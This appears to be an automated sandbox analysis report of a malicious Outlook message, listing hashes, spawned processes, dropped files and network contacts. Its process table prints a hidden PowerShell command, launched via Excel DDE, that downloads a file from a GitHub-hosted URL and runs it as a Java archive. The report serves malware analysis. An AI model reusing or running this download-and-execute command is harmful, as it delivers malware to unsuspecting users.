File name: | FW Selamlar ACIL KONTROL EDIN ÖZKAN VİRÜS BU SANIRIM DEĞİLMİ.msg |
Full analysis: | https://app.any.run/tasks/fb38d126-699c-479e-9ff0-4f42482c82f9 |
Verdict: | Malicious activity |
Analysis date: | September 19, 2019, 07:10:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/vnd.ms-outlook |
File info: | CDFV2 Microsoft Outlook Message |
MD5: | FFA129F43EEC805C72FB10E7618F8B29 |
SHA1: | A2CFF9F06E38A06B843538EF84578B686A198E15 |
SHA256: | DFDF2509BD59A5D2FFEA177495AC6DCB187429E8C30FCA3EAA8BE8DD3827D49A |
SSDEEP: | 1536:mK/BIezBNTqQw4CLUXOb77DTCFYKKKTsHUhSS:jzBNTqrz7N |
.msg | | | Outlook Message (58.9) |
---|---|---|
.oft | | | Outlook Form Template (34.4) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3376 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\FW Selamlar ACIL KONTROL EDIN ÖZKAN VİRÜS BU SANIRIM DEĞİLMİ.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
1008 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
4092 | CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/881557/0gxfzyh8/gh-pages/ku9b5dv.rtf\" ,\" %tmp%\\FC6QMo.jar\") }" & %tmp%\\FC6QMo.jar | C:\Windows\system32\CMD.EXE | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2664 | powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/881557/0gxfzyh8/gh-pages/ku9b5dv.rtf\" ,\" C:\Users\admin\AppData\Local\Temp\\FC6QMo.jar\") }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2628 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\FC6QMo.jar" | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | — | CMD.EXE |
User: admin Company: Oracle Corporation Integrity Level: MEDIUM Description: Java(TM) Platform SE binary Exit code: 0 Version: 8.0.920.14 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3376 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR99A5.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3376 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:E6D4B8517915FB75618D4BF2FF48832B | SHA256:EEEAC57A30E224A159E95087CAD97F6015F560FEE476732282A030CBE13F26FA | |||
3376 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B35A7114.dat | image | |
MD5:3D5F732E72E96EF1EC2F3877C172397E | SHA256:D63218A5F04FE3924E83EE3B190FE8D1365FB6B04170FEDC7635C30F61F9B006 | |||
3376 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B6AF7CAE.dat | image | |
MD5:69B7FC9EFFA301E4238337F80F7B1943 | SHA256:3D46E040A7D64A865A19737100650A468E02CDC78B15124AC1924C90A1A14AD0 | |||
3376 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1F51E5A0.dat | image | |
MD5:E9464B730CF4BDA59247CD2E56E68674 | SHA256:FA00F7E2C5B6EA2EA94FCEB4AC5612E4C8E8A8BCF5B7678CB005C78386BCB044 | |||
3376 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5466921.dat | image | |
MD5:042E14E4A284A80B78B8F68AF8D6D3DA | SHA256:A6356D3B84C18564420FDFCAEDAEF643B31F0EF2FCDF7951E8A2C474A56DB749 | |||
3376 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E6178B9F.dat | image | |
MD5:BD9EF18DB6EF932C03E93A6DA9CD4CE7 | SHA256:490ACF9B24FAD678AB25498745243E536C85D76046C9709757DFA0BF3546439F | |||
3376 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6AC77013.dat | image | |
MD5:AFA321D373174B22DC32F28BCCA9764C | SHA256:B79993E55C9811CF5550F0B4765DC439EF91A4417E747D7F0B25BDAC460BE51E | |||
3376 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\JD9DBPGY\Belge_8 (2).xls\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3376 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92D13CEC.dat | image | |
MD5:B07BEE671DC501FFDD2A7A92C4C12EEB | SHA256:70AFAFB0193E9425AA23313B43FE1C1C7D54BF4E9D74FD1243D4073203FDC750 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3376 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2664 | powershell.exe | 151.101.0.133:443 | raw.githubusercontent.com | Fastly | US | malicious |
3376 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
raw.githubusercontent.com |
| shared |